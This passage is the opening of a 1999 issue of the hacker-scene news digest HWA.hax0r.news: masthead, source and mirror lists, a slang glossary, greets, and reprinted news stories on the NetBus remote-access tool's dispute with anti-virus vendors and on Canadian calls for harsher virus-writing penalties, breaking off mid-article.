[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= ========================================================================== = <=-[ HWA.hax0r.news ]-=> = ========================================================================== [=HWA'99=] Number 26 Volume 1 1999 July 24th 99 ========================================================================== [ 61:20:6B:69:64:20:63:6F:75: ] [ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ] [ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ] ========================================================================== http://www.fourmilab.to/hackdiet/www/hackdietf.html - The Hacker's Diet: How to lose weight and hair through stress and poor nutrition And joke of the week: http://support.microsoft.com/support/kb/articles/q149/9/62.asp HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net and www.digitalgeeks.com thanks to p0lix for the digitalgeeks bandwidth and airportman for the Cubesoft bandwidth. Also shouts out to all our mirror sites! tnx guys. http://www.csoft.net/~hwa http://www.digitalgeeks.com/hwa HWA.hax0r.news Mirror Sites: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.csoft.net/~hwa/ http://www.digitalgeeks.com/hwa. http://members.tripod.com/~hwa_2k http://welcome.to/HWA.hax0r.news/ http://www.attrition.org/~modify/texts/zines/HWA/ http://packetstorm.harvard.edu/hwahaxornews/ * DOWN * http://archives.projectgamma.com/zines/hwa/. http://www.403-security.org/Htmls/hwa.hax0r.news.htm SYNOPSIS (READ THIS) -------------------- The purpose of this newsletter is to 'digest' current events of interest that affect the online underground and netizens in general. This includes coverage of general security issues, hacks, exploits, underground news and anything else I think is worthy of a look see. (remember i'm doing this for me, not you, the fact some people happen to get a kick/use out of it is of secondary importance). This list is NOT meant as a replacement for, nor to compete with, the likes of publications such as CuD or PHRACK or with news sites such as AntiOnline, the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor could any other 'digest' of this type do so. It *is* intended however, to compliment such material and provide a reference to those who follow the culture by keeping tabs on as many sources as possible and providing links to further info, its a labour of love and will be continued for as long as I feel like it, i'm not motivated by dollars or the illusion of fame, did you ever notice how the most famous/infamous hackers are the ones that get caught? there's a lot to be said for remaining just outside the circle... @HWA =-----------------------------------------------------------------------= Welcome to HWA.hax0r.news ... #26 =-----------------------------------------------------------------------= We could use some more people joining the channel, its usually pretty quiet, we don't bite (usually) so if you're hanging out on irc stop by and idle a while and say hi... ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** *** *** *** please join to discuss or impart news on techno/phac scene *** *** stuff or just to hang out ... someone is usually around 24/7*** *** *** *** Note that the channel isn't there to entertain you its for *** *** you to talk to us and impart news, if you're looking for fun*** *** then do NOT join our channel try #weirdwigs or something... *** *** we're not #chatzone or #hack *** *** *** ******************************************************************* =-------------------------------------------------------------------------= Issue #26 =--------------------------------------------------------------------------= [ INDEX ] =--------------------------------------------------------------------------= Key Intros =--------------------------------------------------------------------------= 00.0 .. COPYRIGHTS ...................................................... 00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC ....................... 00.2 .. SOURCES ......................................................... 00.3 .. THIS IS WHO WE ARE .............................................. 00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?.......................... 00.5 .. THE HWA_FAQ V1.0 ................................................ =--------------------------------------------------------------------------= Key Content =--------------------------------------------------------------------------= 01.0 .. GREETS .......................................................... 01.1 .. Last minute stuff, rumours, newsbytes ........................... 01.2 .. Mailbag ......................................................... 02.0 .. From the Editor.................................................. 03.0 .. NetBus suffers same industry pitfalls as Bo2k.................... 04.0 .. Spreading Viruses Equal A Terrorist Attack ...................... 05.0 .. Y2K Bug Fixes May Cause Other Problems .......................... 06.0 .. Security Fears are Slowing UK E-Commerce ........................ 07.0 .. More Defc0n than you can shake three sticks at................... 08.0 .. How to Look Like a Hacker.(quite hilarious really)............... 09.0 .. AV Vendors Still Scrambling Over BO2K ........................... 10.0 .. The Back Orifice 2000 Controversy................................ 11.0 .. Year Old IIS Hole Still Causing Problems ........................ 12.0 .. NCIC 2000 Now Online ............................................ 13.0 .. E-commerce Increases Security Risk .............................. 14.0 .. Cyberspace Relatively Safe ...................................... 15.0 .. AntiOnline Under Investigation .................................. 16.0 .. Parse Defcon Video Available .................................... 17.0 .. cDc Challenges Microsoft to Recall SMS (wicked!)................. 18.0 .. BlackHat Insiders Want to Quit Security Biz...................... 19.0 .. Attrition Closes Down Negation .................................. 20.0 .. ISS Offers Cracking Tools ....................................... 21.0 .. IBM Researching Proactive Security .............................. 22.0 .. InET Issue #3 ................................................... 23.0 .. National ID Card Law Set to be Enacted .......................... 24.0 .. Local Agencies Not Concerned About Computer Intrusions .......... 25.0 .. Microfraud Becomes Big Deal ..................................... 26.0 .. China Arrests One After Posting to Internet ..................... 27.0 .. The Truth About Abe - MTV "Punk Hacker" ......................... 28.0 .. This is just silly: BO2Kfun Page Shut Down From Overuse ....... 29.0 .. Man Sentenced for Using Cell Phone .............................. 30.0 .. HILLARY CLINTON AND HACKERS...................................... 31.0 .. SAMBA 2.0.5 SECURITY FIXES....................................... 32.0 .. SECURITY STANDARDS FOR BANKING................................... 33.0 .. What makes UNIX users so smart? ................................. 34.0 .. Statement by Legions of the Underground Released ................ 35.0 .. L0pht Releases Public Beta of AntiSniff ......................... 36.0 .. Bill to Limit Crypto Exports Approved ........................... 37.0 .. Russian and Ukrainian Govs Monitor Internet Communications ...... 38.0 .. Here we go again, Mitnick to be Sentenced on Monday (Supposedly) 39.0 .. Virus Infestations on the Rise (?)............................... 40.0 .. Do Handheld Electronics cause Problems with Avionics? ........... 41.0 .. Alert: RDS IIS vulnerability/fix ................................ 42.0 .. Highschool crackers.............................................. 43.0 .. Unauthorized Access to IIS Servers through ODBC Data Access with RDS 44.0 .. Who's fault is the Y2K bug?. .................................... 45.0 .. CERT ADVISORY CA-99-09........................................... 46.0 .. Tracking Criminals With New Technology........................... 47.0 .. 3Com HiPer Arcs Community Name Vulnerability..................... 48.0 .. Aleph One in Tokyo............................................... 49.0 .. Windows2000 introduces Public Key Encryption..................... 50.0 .. Remote OS detection via TCP/IP Stack FingerPrinting (Extra)...... =--------------------------------------------------------------------------= AD.S .. Post your site ads or etc here, if you can offer something in return thats tres cool, if not we'll consider ur ad anyways so send it in. ads for other zines are ok too btw just mention us in yours, please remember to include links and an email contact. Corporate ads will be considered also and if your company wishes to donate to or participate in the upcoming Canc0n99 event send in your suggestions and ads now...n.b date and time may be pushed back join mailing list for up to date information....................................... Current dates: Aug19th-22nd Niagara Falls... ................. Ha.Ha .. Humour and puzzles ............................................ Hey You!........................................................ =------=........................................................ Send in humour for this section! I need a laugh and its hard to find good stuff... ;)........................................... SITE.1 .. Featured site, ................................................. H.W .. Hacked Websites ............................................... A.0 .. APPENDICES...................................................... A.1 .. PHACVW linx and references...................................... =--------------------------------------------------------------------------= @HWA'99 00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ). Important semi-legalese and license to redistribute: YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email cruciphux@dok.org THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS: I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND REDISTRIBUTE/MIRROR. - EoD Although this file and all future issues are now copyright, some of the content holds its own copyright and these are printed and respected. News is news so i'll print any and all news but will quote sources when the source is known, if its good enough for CNN its good enough for me. And i'm doing it for free on my own time so pfffft. :) No monies are made or sought through the distribution of this material. If you have a problem or concern email me and we'll discuss it. cruciphux@dok.org Cruciphux [C*:.] 00.1 CONTACT INFORMATION AND MAIL DROP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada / North America (hell even if you are inside ..) and wish to send printed matter like newspaper clippings a subscription to your cool foreign hacking zine or photos, small non-explosive packages or sensitive information etc etc well, now you can. (w00t) please no more inflatable sheep or plastic dog droppings, or fake vomit thanks. Send all goodies to: HWA NEWS P.O BOX 44118 370 MAIN ST. NORTH BRAMPTON, ONTARIO CANADA L6V 4H5 WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are ~~~~~~~ reading this from some interesting places, make my day and get a mention in the zine, send in a postcard, I realize that some places it is cost prohibitive but if you have the time and money be a cool dude / gal and send a poor guy a postcard preferably one that has some scenery from your place of residence for my collection, I collect stamps too so you kill two birds with one stone by being cool and mailing in a postcard, return address not necessary, just a "hey guys being cool in Bahrain, take it easy" will do ... ;-) thanx. Ideas for interesting 'stuff' to send in apart from news: - Photo copies of old system manual front pages (optionally signed by you) ;-) - Photos of yourself, your mom, sister, dog and or cat in a NON compromising position plz I don't want pr0n. - Picture postcards - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes with hack/security related archives, logs, irc logs etc on em. - audio or video cassettes of yourself/others etc of interesting phone fun or social engineering examples or transcripts thereof. Stuff you can email: - Prank phone calls in .ram or .mp* format - Fone tones and security announcements from PBX's etc - fun shit you sampled off yer scanner (relevant stuff only like #2600 meeting activities) - reserved for one smiley face -> :-) <- - PHACV lists of files that you have or phac cd's you own (we have a burner, *g*) - burns of phac cds (email first to make sure we don't already have em) - Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in .ram etc format or .mp* If you still can't think of anything you're probably not that interesting a person after all so don't worry about it Our current email: Submissions/zine gossip.....: hwa@press.usmc.net Private email to editor.....: cruciphux@dok.org Distribution/Website........: sas72@usa.net @HWA 00.2 Sources *** ~~~~~~~~~~~ Sources can be some, all, or none of the following (by no means complete nor listed in any degree of importance) Unless otherwise noted, like msgs from lists or news from other sites, articles and information is compiled and or sourced by Cruciphux no copyright claimed. News & I/O zine ................. http://www.antionline.com/ Back Orifice/cDc..................http://www.cultdeadcow.com/ News site (HNN) .....,............http://www.hackernews.com/ Help Net Security.................http://net-security.org/ News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/ NewsTrolls .(daily news ).........http://www.newstrolls.com/ News + Exploit archive ...........http://www.rootshell.com/beta/news.html CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest News site+........................http://www.zdnet.com/ News site+Security................http://www.gammaforce.org/ News site+Security................http://www.projectgamma.com/ News site+Security................http://securityhole.8m.com/ News site+Security related site...http://www.403-security.org/ News/Humour site+ ................http://www.slashdot.org +Various mailing lists and some newsgroups, such as ... +other sites available on the HNN affiliates page, please see http://www.hackernews.com/affiliates.html as they seem to be popping up rather frequently ... http://www.the-project.org/ .. IRC list/admin archives http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk alt.hackers.malicious alt.hackers alt.2600 BUGTRAQ ISN security mailing list ntbugtraq <+others> NEWS Agencies, News search engines etc: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.cnn.com/SEARCH/ Link http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0 Link http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack Link http://www.ottawacitizen.com/business/ Link http://search.yahoo.com.sg/search/news_sg?p=hack Link http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack Link http://www.zdnet.com/zdtv/cybercrime/ Link http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column) Link NOTE: See appendices for details on other links. http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm Link http://freespeech.org/eua/ Electronic Underground Affiliation Link http://ech0.cjb.net ech0 Security Link http://axon.jccc.net/hir/ Hackers Information Report Link http://net-security.org Net Security Link http://www.403-security.org Daily news and security related site Link Submissions/Hints/Tips/Etc ~~~~~~~~~~~~~~~~~~~~~~~~~~ All submissions that are `published' are printed with the credits you provide, if no response is received by a week or two it is assumed that you don't care wether the article/email is to be used in an issue or not and may be used at my discretion. Looking for: Good news sites that are not already listed here OR on the HNN affiliates page at http://www.hackernews.com/affiliates.html Magazines (complete or just the articles) of breaking sekurity or hacker activity in your region, this includes telephone phraud and any other technological use, abuse hole or cool thingy. ;-) cut em out and send it to the drop box. - Ed Mailing List Subscription Info (Far from complete) Feb 1999 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~ ISS Security mailing list faq : http://www.iss.net/iss/maillist.html THE MOST READ: BUGTRAQ - Subscription info ~~~~~~~~~~~~~~~~~~~~~~~~~~~ What is Bugtraq? Bugtraq is a full-disclosure UNIX security mailing list, (see the info file) started by Scott Chasin . To subscribe to bugtraq, send mail to listserv@netspace.org containing the message body subscribe bugtraq. I've been archiving this list on the web since late 1993. It is searchable with glimpse and archived on-the-fly with hypermail. Searchable Hypermail Index; http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html Link About the Bugtraq mailing list ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The following comes from Bugtraq's info file: This list is for *detailed* discussion of UNIX security holes: what they are, how to exploit, and what to do to fix them. This list is not intended to be about cracking systems or exploiting their vulnerabilities. It is about defining, recognizing, and preventing use of security holes and risks. Please refrain from posting one-line messages or messages that do not contain any substance that can relate to this list`s charter. I will allow certain informational posts regarding updates to security tools, documents, etc. But I will not tolerate any unnecessary or nonessential "noise" on this list. Please follow the below guidelines on what kind of information should be posted to the Bugtraq list: + Information on Unix related security holes/backdoors (past and present) + Exploit programs, scripts or detailed processes about the above + Patches, workarounds, fixes + Announcements, advisories or warnings + Ideas, future plans or current works dealing with Unix security + Information material regarding vendor contacts and procedures + Individual experiences in dealing with above vendors or security organizations + Incident advisories or informational reporting Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq reflector address if the response does not meet the above criteria. Remember: YOYOW. You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of those words without your permission in any medium outside the distribution of this list may be challenged by you, the author. For questions or comments, please mail me: chasin@crimelab.com (Scott Chasin) Crypto-Gram ~~~~~~~~~~~ CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security. To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com.  To unsubscribe, visit http://www.counterpane.com/unsubform.html.  Back issues are available on http://www.counterpane.com. CRYPTO-GRAM is written by Bruce Schneier.  Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms.  He served on the board of the International Association for Cryptologic Research, EPIC, and VTW.  He is a frequent writer and lecturer on cryptography. CUD Computer Underground Digest ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This info directly from their latest ish: Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09                             ISSN  1004-042X        Editor: Jim Thomas (cudigest@sun.soci.niu.edu)        News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)        Archivist: Brendan Kehoe        Poof Reader:   Etaion Shrdlu, Jr.        Shadow-Archivists: Dan Carosone / Paul Southworth                           Ralph Sims / Jyrki Kuoppala                           Ian Dickinson        Cu Digest Homepage: http://www.soci.niu.edu/~cudigest [ISN] Security list ~~~~~~~~~~~~~~~~~~~ This is a low volume list with lots of informative articles, if I had my way i'd reproduce them ALL here, well almost all .... ;-) - Ed Subscribe: mail majordomo@repsec.com with "subscribe isn". @HWA 00.3 THIS IS WHO WE ARE ~~~~~~~~~~~~~~~~~~ Some HWA members and Legacy staff ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ cruciphux@dok.org.........: currently active/editorial darkshadez@ThePentagon.com: currently active/man in black fprophet@dok.org..........: currently active/IRC+ man in black sas72@usa.net ............. currently active/IRC+ distribution vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black dicentra...(email withheld): IRC+ grrl in black eentity ...( '' '' ): Currently active/IRC+ man in black Foreign Correspondants/affiliate members ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Qubik ............................: United Kingdom D----Y ...........................: USA/world media HWA members ......................: World Media Past Foreign Correspondants (currently inactive or presumed dead) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ N0Portz ..........................: Australia system error .....................: Indonesia Wile (wile coyote) ...............: Japan/the East Ruffneck ........................: Netherlands/Holland Please send in your sites for inclusion here if you haven't already also if you want your emails listed send me a note ... - Ed Spikeman's site is down as of this writing, if it comes back online it will be posted here. http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian) ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** ******************************************************************* :-p 1. We do NOT work for the government in any shape or form.Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/ 2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news events its a good idea to check out issue #1 at least and possibly also the Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ... @HWA 00.4 Whats in a name? why HWA.hax0r.news?? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Well what does HWA stand for? never mind if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you. In case you couldn't figure it out hax0r is "new skewl" and although it is laughed at, shunned, or even pidgeon holed with those 'dumb leet (l33t?) dewds' this is the state of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you up and comers, i'd highly recommend you get that book. Its almost like buying a clue. Anyway..on with the show .. - Editorial staff @HWA 00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Also released in issue #3. (revised) check that issue for the faq it won't be reprinted unless changed in a big way with the exception of the following excerpt from the FAQ, included to assist first time readers: Some of the stuff related to personal useage and use in this zine are listed below: Some are very useful, others attempt to deny the any possible attempts at eschewing obfuscation by obsucuring their actual definitions. @HWA - see EoA ;-) != - Mathematical notation "is not equal to" or "does not equal" ASC(247) "wavey equals" sign means "almost equal" to. If written an =/= (equals sign with a slash thru it) also means !=, =< is Equal to or less than and => is equal to or greater than (etc, this aint fucking grade school, cripes, don't believe I just typed all that..) AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21) AOL - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the least they could try leasing one?? *CC - 1 - Credit Card (as in phraud) 2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's CCC - Chaos Computer Club (Germany) *CON - Conference, a place hackers crackers and hax0rs among others go to swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk watch videos and seminars, get drunk, listen to speakers, and last but not least, get drunk. *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker speak he's the guy that breaks into systems and is often (but by no means always) a "script kiddie" see pheer 2 . An edible biscuit usually crappy tasting without a nice dip, I like jalapeno pepper dip or chives sour cream and onion, yum - Ed Ebonics - speaking like a rastafarian or hip dude of colour also wigger Vanilla Ice is a wigger, The Beastie Boys and rappers speak using ebonics, speaking in a dark tongue ... being ereet, see pheer EoC - End of Commentary EoA - End of Article or more commonly @HWA EoF - End of file EoD - End of diatribe (AOL'ers: look it up) FUD - Coined by Unknown and made famous by HNN - "Fear uncertainty and doubt", usually in general media articles not high brow articles such as ours or other HNN affiliates ;) du0d - a small furry animal that scurries over keyboards causing people to type weird crap on irc, hence when someone says something stupid or off topic 'du0d wtf are you talkin about' may be used. *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to define, I think it is best defined as pop culture's view on The Hacker ala movies such as well erhm "Hackers" and The Net etc... usually used by "real" hackers or crackers in a derogatory or slang humorous way, like 'hax0r me some coffee?' or can you hax0r some bread on the way to the table please?' 2 - A tool for cutting sheet metal. HHN - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k. ;& HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d MFI/MOI- Missing on/from IRC NFC - Depends on context: No Further Comment or No Fucking Comment NFR - Network Flight Recorder (Do a websearch) see 0wn3d NFW - No fuckin'way *0WN3D - You are cracked and owned by an elite entity see pheer *OFCS - Oh for christ's sakes PHACV - And variations of same Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare Alternates: H - hacking, hacktivist C - Cracking C - Cracking V - Virus W - Warfare A - Anarchy (explosives etc, Jolly Roger's Cookbook etc) P - Phreaking, "telephone hacking" PHone fREAKs ... CT - Cyber Terrorism *PHEER - This is what you do when an ereet or elite person is in your presence see 0wn3d *RTFM - Read the fucking manual - not always applicable since some manuals are pure shit but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass. TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0 TBA - To Be Arranged/To Be Announced also 2ba TFS - Tough fucking shit. *w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions from the underground masses. also "w00ten" 2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers) *wtf - what the fuck, where the fuck, when the fuck etc .. *ZEN - The state you reach when you *think* you know everything (but really don't) usually shortly after reaching the ZEN like state something will break that you just 'fixed' or tweaked. @HWA -=- :. .: -=- 01.0 Greets!?!?! yeah greets! w0w huh. - Ed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Thanks to all in the community for their support and interest but i'd like to see more reader input, help me out here, whats good, what sucks etc, not that I guarantee i'll take any notice mind you, but send in your thoughts anyway. * all the people who sent in cool emails and support FProphet Pyra TwstdPair _NeM_ D----Y Dicentra vexxation sAs72 Spikeman p0lix Also shouts to; kimblerj and xochitl13 who dropped off postcards, tnx guys! Ken Williams/tattooman of PacketStorm, hang in there Ken...:( & Kevin Mitnick (watch yer back) kewl sites: + http://www.securityportal.com/ NEW + http://www.securityfocus.com/ NEW + http://www.hackcanada.com/ + http://www.l0pht.com/ + http://www.2600.com/ + http://www.freekevin.com/ + http://www.genocide2600.com/ + http://www.packetstorm.harvard.edu/ ******* DOWN ********* SEE AA.A + http://www.hackernews.com/ (Went online same time we started issue 1!) + http://www.net-security.org/ + http://www.slashdot.org/ + http://www.freshmeat.net/ + http://www.403-security.org/ + http://ech0.cjb.net/ @HWA 01.1 Last minute stuff, rumours and newsbytes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "What is popular isn't always right, and what is right isn't always popular..." - FProphet '99 +++ When was the last time you backed up your important data? ++ NO DINERO, NO DOMAIN (TECH. 3:00 am) http://www.wired.com/news/news/email/explode-infobeat/technology/story/20878.html Network Solutions will demand advance payments for domain name registrations in a move designed to squelch cyber-squatters. By Debbi Gardiner. Thanks to myself for providing the info from my wired news feed and others from whatever sources, also to Spikeman for sending in past entries.... - Ed @HWA 01.2 MAILBAG - email and posts from the message board worthy of a read ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 02.0 From the editor. ~~~~~~~~~~~~~~~~ #include #include #include main() { printf ("Read commented source!\n\n"); /* * Issue #26 * * What can I say? the press is full of bullshit stories * about defcon and bo2k, guess nothing else happened * lately.... slim pickings indeed. * * hwa@press.usmc.net * */ printf ("EoF.\n"); } Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net complaints and all nastygrams and mai*lbombs can go to /dev/nul nukes, synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org danke. C*:. 03.0 NetBus suffers same industry pitfalls as Bo2k ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ NetBus Pro - Remote Admin Shareware or Evil Tool contributed by sprfish NetBus is facing similar problems as Back Orifice from AntiVirus companies. NetBus, a $12 shareware program, is classified as a 'hacker tool' and is detected and removed by all of the major AntiVirus software makers. The authors of NetBus have contemplated suing the AV companies claiming that they are trying to protect their own remote administration programs while squashing the competition. MSNBC http://www.msnbc.com/news/290766.asp NetBus maker to sue anti-virus firms? Back Orifice-like tool is removed by virus software; authors say that’s hurting sales, and the tool’s legit By Bob Sullivan MSNBC July 16 — While one “remote administration tool,” Back Orifice, stole headlines last week, authors of the another well-known back-door program, NetBus Pro, were gearing up to sue for the right to sell it. Anti-virus software currently detects and removes NetBus, another program that lets intruders take control of a victim’s PC from anywhere on the Internet. NetBus Pro authors, who charge $12 for the product, say it’s a legitimate software tool. They might sue anti-virus vendors for interfering with their right to sell it IT’S A STICKY STORY. The first version of NetBus was a favorite among hackers — it even included easy ways to taunt victims, such as buttons to open and close a victim’s CD-ROM door. Earlier this year, author Carl-Fredrik Neikter came out with an updated version, which he said was redesigned to be used as a professional “remote administration tool.” And he started charging a $12 registration fee. But anti-virus software companies, noting that NetBus can still be used by hackers, treat the program like a virus. That makes NetBus and any anti-virus program incompatible, and NetBus Pro owners say that’s stifling their sales. Even worse, according to Neikter’s partner Judson Spence, it’s anti-competitive — he says the anti-virus companies are squelching his product because it’s competition for their remote administration software. Symantec, which makes Norton’s AntiVirus Utility, sells remote administration tool PC Anywhere for $159. “On its face, it looks like a good case,” said attorney Mark Rubin, who has been retained my NetBus. “The product belongs to a corporation. It’s designed to do a function. You’ve got another business telling people, ‘You can’t use that product’ ... You’ve got Symantec saying you shouldn’t use NetBus Pro. That’s the classic definition of an anti-competitive act.” Members of the Cult of the Dead Cow, which authored Back Orifice, agree with Rubin’s premise. Back Orifice is also removed by anti-virus programs. “It’s a huge problem for anybody who wants to use our product legitimately that they have to completely disable their AV software to use BO2K,” said a member calling himself Tweety Fish. “We’ve talked about suing them, but since our product is free, and we gain no income from what we do, the legal fees would probably be prohibitive. From what we can tell, we would have a pretty good case.” Anti-virus companies say while this might be an interesting intellectual debate, it would be a silly court case. NetBus is a hacking tool, they say, designed to run on victims’ machines without their knowledge. The lawsuit would be frivolous, as it would be difficult to persuade a judge that NetBus is a legitimate software product. “Our policy would be if they were to release a version which very clearly identifies itself as NetBus every time it ran, then we would not detect that,” said Stephen Trilling, director of research at Symantec’s Antivirus Research Center. Further, he said, Norton users are given an option when NetBus is detected — they can leave the software on their machine. He denied Symantec would ever consider using Norton’s AntiVirus program to disable a competitive product. “We’re in the business of protecting customers,” he said. The issue does have some shades of gray — when NetBus was released in February, Data Fellows’ F-Secure product initially didn’t detect the new NetBus, deferring to the notion it was a commercial product. But later, after customers complained, NetBus detection was added. “Net administrators I know would get fired for using NetBus,” said Dan Takata, spokesman for Data Fellows. “It can be used for good, but it’s inherently a hacker program.” That’s just not so, complains Spence, who says more than 700,000 copies of the program have been downloaded, and about 2,000 people have registered copies of the program. He says several corporations, and even the U.S. Air Force, are interested in using NetBus as an administration tool. “I’m optimistic that once we raise the issue, legal departments [at AV companies] will act,” says Rubin. “Every day this costs money to NetBus Pro.” @HWA 04.0 Spreading Viruses Equal A Terrorist Attack ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by nvirB Andre Gauthier, chairman of the Information Technology Association of Canada thinks that people who create and or spread viruses should be treated as terrorists and should have stiffer penalties applied to them. The ITAC recently requested the Canadian government increase the penalties for these types of crimes. Edmonton Journal http://www.edmontonjournal.com/technology/stories/990716/2615262.html Get tough on computer-virus makers, Ottawa told Rogue programs that play havoc with computer files seen as equivalent to a terrorist attack Philip Demont Southam Newspapers; Southam News Ottawa has to get tougher with hackers who send file-destroying computer viruses over the Internet, the industry association representing Canada's computer industry said Thursday. The mischievous makers who devise programs that destroy corporate computer files and cause entire high-tech systems to collapse are getting away with a slap on the wrist for a crime that is costing the Canadian economy millions annually, said Andre Gauthier, chair of the Information Technology Association of Canada and senior vice-president of LGS Group Inc. "Too many people consider these things as funny. But sending a virus is just like launching a terrorist attack on a company," Gauthier said. ITAC, which represents 1,300 Canadian software and hardware companies, sent a letter Thursday to federal Justice Minister Anne McLellan asking her to increase the penalties for this kind of crime and to work more closely with other law enforcement agencies globally to track down virus makers. Over the past several months, the Chernobyl, Melissa and Worm-Explore.Zip viruses made headlines internationally as they attacked the computer systems of corporations and government agencies in many countries. Viruses are programs that enter a computer system through the e-mail or other external links and then cause havoc in the network, everything from exploding fireworks on a person's computer screen to the elimination of stored files on the system's hard 